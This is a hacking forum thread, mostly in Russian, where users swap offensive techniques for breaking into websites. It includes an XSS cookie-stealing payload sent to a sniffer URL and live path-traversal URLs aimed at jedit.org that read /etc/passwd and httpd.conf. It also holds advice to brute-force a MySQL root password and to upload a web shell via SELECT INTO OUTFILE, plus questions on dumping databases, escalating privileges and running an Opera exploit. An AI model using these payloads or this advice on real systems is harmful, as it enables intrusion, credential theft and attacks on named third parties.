гранты с INSERT без SELECT - это изврашения и наврятли там нет SELECT грантов ибо в конструкции INSERT допустим SELECT(депенд оф версион оф корс), а насчет дампа - тут либо с помошью скрипта(программы при удаленном конекте) локально/удаленно(если разрешенно в конфиге для данного Юзера и порт ничем не прикрыт) либо если еще есть в добавок file_priv дампить в файловую систему и сливать.
Это типо можно создать ещё одного юзера или у меня глюки Щя посмотрю, если это так то приведу пример ps Нашёл тока ps2 **** = 0000
Угу, если прав хватит работать с mysql(если уже SELECT нету то я сомневаюмь что к mysql есть доступ).
Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script> Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться? Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie это? помогите пожалуста... мозги спарились уже
Запрос метода GET или POST? Вааще если GET то врядтле ограничят. А если через POST то в инпуте есть ограничение. Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
>>Вааще если GET то врядтле ограничят. бред PHP: <?php if($_GET['hehe'] and strlen($_GET['hehe'])<16) { echo 'ok'; }else{ exit; } ?> >>А если через POST то в инпуте есть ограничение. <input type=text name="rate" size=12 maxlength=8> ГЕТ или ПОСТ все равно будет ограничение >>Убери его через исходник, но это если сам php скрипт непроверяет входящие данные. сам понял что написал?
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 Возможно ли сдесь найти логи? (по стандартным путям не нашёл)
На счет путей не знаю, но можно найти полный путь до сайта. В файле httpd.conf ищеть DocumentRoot... Вот он "/var/www/html"... Попробуй пути еще раз из тех, что ettee давал. Вот - http://forum.antichat.ru/thread49775.html
Внизу есть вот это По-моему это значит что папка доступна только для 127.0.0.1. Или нет?? По крайней мере скрипты по этому пути не читаются
Hi all greets to ur amazing job here sorry fo my english but i need help with this now i got into site with sql inj and mysql.user table 1-got root and pass what is the way to decrypt it? 2- i got access to load_file works but i cant find my way on the server by load_file() doesnt got me any error load_file(etc/passwd) works good is there is any way to deal with this ???????? thanx to u all
Hello, To decrypt(right is not "decrypt", but bruteforce ) mysql root password you can use a PasswordsPro utility from www.insidepro.com but under some circumbstances you won't need a mysql root password. If you get a pass, than you can look for phpmyadmin, or try to connect to mysql using mysql utility. FIrst of all, if magic_quotes_gpc option is off, you can try a "select into outfile" query, to upload a shell. to do this you should know a absolute local path. to find out the paths try to read default configs and logs with load_file() function. if magic_quotes_gpc option is on, try to get as much information as possible, probably that would help you(e.g. config files with ftp or other passwords).
Сплоет заточен под Оперу. 9.63. http://milw0rm.com/exploits/7135 Пытаюсь запустить через виртуалку. Система Windows XP. Service Pack 3. Браузер Opera 9.24 Эксплоит должен вызывать калькулятор после перезаполнение буфера. Но никак не могу разобратся с вызовом удаленного кода(калькулятор). Он должен запускаться со стороны клиента, или со стороны сервера? Code: var evil = "file://"; - пуста по умолчанию. Пытался выполнить как Code: var evil = "http://test.test./cals.exe"; и Code: var evil = "file://cals.exe"; - да толку ноль.
PaCo Респект Относительно слива БД MySQL с правами INSERT: PaCo я уже отправил тебе сообщение в личку. Всем остальным тоже спасибо за ответы, но прав Root у меня естественно нет! Поэтому если кто нибудь знает методы повышения привилегий пользователя (хотябы до SELECT) буду рад услышать!
